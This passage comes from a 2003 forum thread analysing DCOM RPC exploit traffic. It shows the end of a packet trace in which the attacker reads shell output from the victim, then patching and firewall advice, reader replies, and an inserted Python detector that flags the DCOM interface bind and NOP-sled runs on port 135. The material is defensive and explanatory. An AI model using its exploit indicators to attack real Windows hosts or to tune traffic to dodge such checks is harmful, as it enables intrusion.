0x0020    8018 4461 dc47 0000 0101 080a 0000 0cd3   ..Da.G..........
0x0030    0000 d3d4 2020 2020 2020 2020 2020 2020   ................
0x0040    2020 2034 2044 6972 2873 2920 2020 322c   ...4.Dir(s)...2,
0x0050    3639 372c 3038 342c 3932 3820 6279 7465   697,084,928.byte
0x0060    7320 6672 6565 0d0a                       s.free..

At this point you could either continue manipulating the victim machine or pretty much do whatever you desired. This however is where the packet trace ends for analysis purposes, as both the start of the exploit, and victim manipulation have been shown.

Exploit countermeasures

The first would be to install the patch from Microsoft. Symantec has them nicely listed here. Another method would be to simply disable the DCOM service itself. There is a step by step method here on how to disable it. Lastly, it should be noted that as a home user you should be behind a firewall at the least as well. Some free firewalls are ZoneAlarm, as well as TPF by Kerio, and Agnitum Outpost. Of the three I would recommend either TPF or Outpost.

We hope that you found this helpful in gaining an understanding of how the exploit itself works. Should you have any suggestions on how to improve this please let me know. Also if there are parts that you do not understand please let us know, and we will attempt to clarify.


Last edited by alt.don on Thu Aug 14, 2003 4:49 pm; edited 2 times in total
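
The trace in the post above can be checked mechanically. The following Python is an added example, not part of the original post or of the exploit's code: it parses the post's first data packet from its tcpdump hex dump, decodes the DCE/RPC header, and flags two indicators visible on port 135 in the trace, the bind to interface 000001a0-0000-0000-c000-000000000046 and a long run of 0x90 bytes. The function names, the 32-byte threshold and the constructed request packet are assumptions of this example.

```python
import re
import uuid

# First data packet of the trace, copied from the post (tcpdump -x output).
BIND_DUMP = """
0x0000    4500 007c f98d 4000 4006 bac7 c0a8 0271   E..|..@.@......q
0x0010    c0a8 0265 8005 0087 1164 3af0 f390 66c1   ...e.....d:...f.
0x0020    8018 16d0 a5f5 0000 0101 080a 0000 c364   ...............d
0x0030    0000 0000 0500 0b03 1000 0000 4800 0000   ............H...
0x0040    7f00 0000 d016 d016 0000 0000 0100 0000   ................
0x0050    0100 0100 a001 0000 0000 0000 c000 0000   ................
0x0060    0000 0046 0000 0000 045d 888a eb1c c911   ...F.....]......
0x0070    9fe8 0800 2b10 4860 0200 0000             ....+.H`....
"""

PTYPES = {0x00: "request", 0x0B: "bind", 0x0C: "bind_ack"}
# Interface UUID requested by the bind packet above (DCOM ISystemActivator).
WATCHED_IFACE = uuid.UUID("000001a0-0000-0000-c000-000000000046")
NOP_RUN_THRESHOLD = 32  # assumption of this example; tune against real traffic
# Offset, then up to eight hex groups; the ASCII column after them is ignored.
_HEX_LINE = re.compile(r"^\s*0x[0-9a-f]{4}:?\s+((?:[0-9a-f]{2,4} ?){1,8})", re.I)

def parse_hexdump(text):
    """Turn tcpdump -x style lines into the raw packet bytes."""
    out = bytearray()
    for line in text.splitlines():
        m = _HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)

def tcp_payload(pkt):
    """Return (src_port, dst_port, payload) for an IPv4/TCP packet, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:int.from_bytes(pkt[2:4], "big")]  # honour the IP total length
    if len(tcp) < 20:
        return None
    data_offset = (tcp[12] >> 4) * 4
    return int.from_bytes(tcp[:2], "big"), int.from_bytes(tcp[2:4], "big"), tcp[data_offset:]

def parse_dcerpc(payload):
    """Decode the common connection-oriented DCE/RPC header; None if not RPC v5."""
    if len(payload) < 16 or payload[0] != 5 or payload[1] not in (0, 1):
        return None
    order = "little" if payload[4] & 0x10 else "big"  # drep integer format
    hdr = {"ptype": PTYPES.get(payload[2], hex(payload[2])), "iface": None,
           "frag_length": int.from_bytes(payload[8:10], order),
           "call_id": int.from_bytes(payload[12:16], order)}
    if payload[2] == 0x0B and len(payload) >= 48:
        # Bind body: the first context element's abstract syntax UUID is at 32..47.
        raw = payload[32:48]
        hdr["iface"] = uuid.UUID(bytes_le=raw) if order == "little" else uuid.UUID(bytes=raw)
    return hdr

def longest_run(data, value=0x90):
    """Length of the longest run of one byte value (0x90 is the x86 NOP)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best

def inspect(pkt):
    """Return findings for one packet sent to tcp/135."""
    findings = []
    parsed = tcp_payload(pkt)
    if not parsed or parsed[1] != 135:
        return findings
    hdr = parse_dcerpc(parsed[2])
    if hdr and hdr["iface"] == WATCHED_IFACE:
        findings.append("bind to %s on tcp/135" % hdr["iface"])
    run = longest_run(parsed[2])
    if run >= NOP_RUN_THRESHOLD:
        findings.append("run of %d 0x90 bytes in tcp/135 payload" % run)
    return findings

def constructed_request(nops):
    """Constructed sample: the post's IP/TCP headers, an RPC request header and
    inert 0x90 filler. Checksums are not recomputed; nothing here verifies them."""
    body = (bytes.fromhex("0500000310000000")
            + (24 + nops).to_bytes(2, "little") + bytes(2)
            + (1).to_bytes(4, "little") + bytes(8) + b"\x90" * nops)
    pkt = bytearray(parse_hexdump(BIND_DUMP)[:52] + body)
    pkt[2:4] = len(pkt).to_bytes(2, "big")
    return bytes(pkt)

if __name__ == "__main__":
    print(inspect(parse_hexdump(BIND_DUMP)))
    print(inspect(constructed_request(40)))
```

In the trace the RPC request is split across two TCP segments (1448 and 256 bytes), so a sensor working on live traffic would reassemble the stream before applying these checks.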
cIx
Posted: Wed Aug 06, 2003 7:05 pm

very nice overview.... thanks for sharing.
tutaepaki
Posted: Wed Aug 06, 2003 10:38 pm

Thanks Don...good description.

Just to be picky ;) Isn't it KPF from Kerio? Not TPF. TPF still exists as a separate chargeable product.
expl01t
Posted: Sat Sep 13, 2003 9:18 am

Good, so smart~~
packet
Posted: Mon Oct 20, 2003 6:17 pm

Nice, I like the packet level analysis with the packet by packet blow by blow format. Great for us packet jockeys.

--P>G>>
ack
Posted: Sat May 07, 2005 10:04 am

perfect! :D
very nice description!
All times are GMT + 2 Hours